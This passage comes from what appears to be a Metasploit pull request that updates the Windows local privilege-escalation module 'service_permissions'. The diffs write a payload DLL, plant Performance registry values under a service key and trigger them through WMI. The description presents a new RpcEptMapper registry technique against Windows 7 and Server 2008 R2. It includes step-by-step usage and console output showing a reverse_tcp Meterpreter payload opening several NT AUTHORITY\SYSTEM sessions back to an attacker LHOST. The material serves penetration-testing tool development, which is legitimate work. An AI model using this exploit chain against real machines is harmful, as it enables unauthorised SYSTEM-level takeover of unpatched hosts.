         vprint_status("[#{serv[:name]}] #{e}")
       end

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -222,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    false
+    true
   end
 
   # If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -200,15 +200,18 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(dll_path, generate_payload_dll)
     register_files_for_cleanup(dll_path)
 
-    registry_setvaldata(reg_key, 'Library', dll_path, 'REG_SZ')
-    registry_setvaldata(reg_key, 'Open', 'OpenPerfData', 'REG_SZ')
-    registry_setvaldata(reg_key, 'Collect', 'CollectPerfData', 'REG_SZ')
-    registry_setvaldata(reg_key, 'Close', 'ClosePerfData', 'REG_SZ')
+    success = true
+    success &= registry_setvaldata(reg_key, 'Library', dll_path, 'REG_SZ')
+    success &= registry_setvaldata(reg_key, 'Open', 'OpenPerfData', 'REG_SZ')
+    success &= registry_setvaldata(reg_key, 'Collect', 'CollectPerfData', 'REG_SZ')
+    success &= registry_setvaldata(reg_key, 'Close', 'ClosePerfData', 'REG_SZ')
 
-    vprint_status("[#{service_name}] Triggering the payload via WMI...")
-    wmic_query('Path Win32_Perf Get', server = 'localhost') # rubocop:disable Lint/UselessAssignment
-
-    registry_deletekey(reg_key)
+    # don't use session_count to accurately account for AGGRESSIVE mode
+    session_count = self.session_count
+    if success
+      vprint_status("[#{service_name}] Triggering the payload via WMI...")
+      wmic_query('Path Win32_Perf Get', server = 'localhost') # rubocop:disable Lint/UselessAssignment
+    end
 
     if backup.nil?
       registry_deletekey(reg_key)
@@ -222,7 +225,15 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    true
+    return false unless success
+
+    # reuse the WMI command timeout since execution is dependent on the WMI command trigger
+    0.upto(datastore['TIMEOUT']) do |_|
+      sleep(1)
+      break if self.session_count > session_count
+    end
+
+    self.session_count > session_count
   end
 
   # If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to


### PR DESCRIPTION
This updates the existing `exploit/windows/local/service_permissions` module with the following features:

* Adds the registry permissions technique - This new technique was disclosed [last Thursday](https://itm4n.github.io/windows-registry-rpceptmapper-eop/) where it was noted to affect fully patched  Windows 7 and Server 2008 R2 systems. This is pretty valuable because the nature of the vulnerability does not rely on memory corruption making it nice and reliable. Additionally, assuming this doesn't get patched, it will be an excellent go-to forever day on these platforms. :tada: 
* Added the `TargetServiceName` option - This option speeds things up when attempting the registry technique against Windows 7 where the user knows which service they'd like to target.
* Module Documentation - I wrote up the module docs for this and a description for each of the techniques along with the important Windows 7-specifics.

There appears to be an issue with the weak file system permissions technique on 64-bit systems due to a Railgun issue that causes the `check_dir_perms` function to fail. I've already opened a ticket for this in #14400. That shouldn't pose a problem while testing this contribution and since the fix is a bit involved, I'll be submitting that separately.

## Verification

The following steps will run through all the latest changes.

- [ ] Start `msfconsole`
- [ ] Obtain a Meterpreter session on a Windows 7 SP 1 system
- [ ] Run: `use exploit/windows/local/service_permissions`
- [ ] Run: `info -d` and read the documentation to ensure they make sense
- [ ] Set the payload and associated options as appropriate
    * The architecture of the payload **must** match the architecture of the host OS to utilize the new registry technique. If they do not match, an error message will be displayed stating that that particular technique will be skipped.
- [ ] Run: `set TargetServiceName rpceptmapper` to only target the service we know will work
- [ ] Run the module and obtain one (or more!) SYSTEM sessions

You'll notice in the example output that **the payload is executed multiple times**. In the example, it was executed 6 times. I'm pretty sure during my testing I've seen it executed even more times than that. I don't think that's a particularly clean experience however the solution I would propose is not specifically related to this vulnerability and will thus be submitted within a separate PR so that it can be evaluated independently of this one.

## Example Output
```
msf6 exploit(windows/local/service_permissions) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN-9NSI4A6AIHJ\aliddle
meterpreter > sysinfo
Computer        : WIN-9NSI4A6AIHJ
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getsystem 
[-] 2001: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(windows/local/service_permissions) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/service_permissions) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/service_permissions) > set TargetServiceName rpceptmapper
TargetServiceName => rpceptmapper
msf6 exploit(windows/local/service_permissions) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/local/service_permissions) > show options 
Module options (exploit/windows/local/service_permissions):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
   SESSION     -1               yes       The session to run this module on.
   TIMEOUT     10               yes       Timeout for WMI command in seconds
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf6 exploit(windows/local/service_permissions) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Trying to find weak permissions in existing services..
[-] Request Error 3014: Operation failed: Access is denied. falling back to registry technique
[*] [RpcEptMapper] Checking for weak file permissions
[-] The operation completed successfully.: C:\Windows\system32\svchost.exe
[*] [RpcEptMapper] Checking for weak service permissions
[*] [RpcEptMapper] Could not open service. OpenServiceA error: Access is denied.
[*] [RpcEptMapper] Checking for weak registry permissions
[+] [RpcEptMapper] Created registry key: HKLM\System\CurrentControlSet\Services\RpcEptMapper\Performance
[*] [RpcEptMapper] Writing payload DLL to C:\Users\aliddle\AppData\Local\Temp\njabikLo.dll
[*] [RpcEptMapper] Triggering the payload via WMI...
[*] [localhost] wmic /output:CLIPBOARD /INTERACTIVE:off /node:localhost Path Win32_Perf Get
[*] Sending stage (200262 bytes) to 192.168.159.61
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.61:50169) at 2020-11-19 12:23:41 -0500
[*] Sending stage (200262 bytes) to 192.168.159.61
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.61:50170) at 2020-11-19 12:23:41 -0500
[*] Sending stage (200262 bytes) to 192.168.159.61
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.61:50171) at 2020-11-19 12:23:42 -0500
[*] Sending stage (200262 bytes) to 192.168.159.61
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.61:50172) at 2020-11-19 12:23:42 -0500
[*] Sending stage (200262 bytes) to 192.168.159.61
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.61:50173) at 2020-11-19 12:23:42 -0500
[*] Sending stage (200262 bytes) to 192.168.159.61
[+] Deleted C:\Users\aliddle\AppData\Local\Temp\njabikLo.dll
[*] Meterpreter session 7 opened (192.168.159.128:4444 -> 192.168.159.61:50174) at 2020-11-19 12:23:43 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
`